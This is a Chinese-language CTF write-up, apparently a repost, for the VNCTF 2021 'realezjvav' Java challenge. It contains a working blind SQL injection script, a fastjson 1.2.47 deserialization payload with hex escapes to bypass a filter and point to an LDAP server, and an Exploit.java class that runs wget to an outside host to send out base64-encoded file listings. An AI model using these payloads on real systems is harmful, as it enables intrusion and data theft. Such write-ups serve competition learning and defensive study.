[VNCTF 2021]realezjvav

admin 2021年3月15日13:30:52评论48 views字数 2846阅读9分29秒阅读模式

点击蓝字 ·  关注我们

java题 开局个登陆框 sql注入?

测得在password位置有注入 一个单引号500。

[VNCTF 2021]realezjvav


两个单引号正常


[VNCTF 2021]realezjvav


fuzz一下 发现过滤的并不多 但是延时函数过滤了 并且貌似不能布尔盲注 搜了下 可以笛卡尔积盲注。


[VNCTF 2021]realezjvav


脚本:

import requestsurl="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"flag=''for i in range(1,50):    f1=flag    top=127    low=33    while low<=top:        mid=(top+low)//2        # p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)        # p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)        p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)        p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)        data1={'username':'admin','password':p1}        data2={'username':'admin','password':p2}        try:            print(i,mid)            r1=requests.post(url,data=data1,timeout=1)        except requests.exceptions.ReadTimeout as e:            flag+=chr(mid)            print(flag)            break        except Exception as e:            pass        else:            try:                r2=requests.post(url,data=data2,timeout=1)            except requests.exceptions.ReadTimeout as e:                low=mid+1            except Exception as e:                pass            else:                top=mid-1    if flag==f1:        break# user# id,username,password# no_0ne_kn0w_th1s

注:超时时间要自己测下 有时候比较大 有时候比较小 可能跑的人太多了吧


登陆之后发现


[VNCTF 2021]realezjvav


测了下可以目录穿越 任意文件读取 读pom.xml


[VNCTF 2021]realezjvav



刚好是有漏洞的版本 并且创建角色的时候刚好是json字符串


参考:https://github.com/CaijiOrz/fastjson-1.2.47-RCE

打一下payload 发现被拦了


[VNCTF 2021]realezjvav


前两天刚好在p神的星球看到


[VNCTF 2021]realezjvav


刚好可以绕过 修改后的payload:

roleJson={"name":{"x40x74x79x70x65":"java.lang.Class","val":"x63x6fx6dx2ex73x75x6ex2ex72x6fx77x73x65x74x2ex4ax64x62x63x52x6fx77x53x65x74x49x6dx70x6c"},"x":{"x40x74x79x70x65":"x63x6fx6dx2ex73x75x6ex2ex72x6fx77x73x65x74x2ex4ax64x62x63x52x6fx77x53x65x74x49x6dx70x6c","dataSourceName":"ldap://1.1.1.1:1389/Exploit","x61x75x74x6fx43x6fx6dx6dx69x74":true}}

貌似没bash 用dnslog带出来的flag 具体流程参见那篇文章就行了 Exploit.java:

public class Exploit{    public Exploit(){        try{            Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","wget http://1.1.1.1:900/?a=$(ls /|base64 -w0"});        }catch(Exception e){            e.printStackTrace();        }    }    public static void main(String[] argv){        Exploit e = new Exploit();    }}


[VNCTF 2021]realezjvav

EDI安全

[VNCTF 2021]realezjvav

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


本文始发于微信公众号(EDI安全):[VNCTF 2021]realezjvav

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月15日13:30:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [VNCTF 2021]realezjvavhttp://cn-sec.com/archives/290016.html

发表评论

匿名网友 填写信息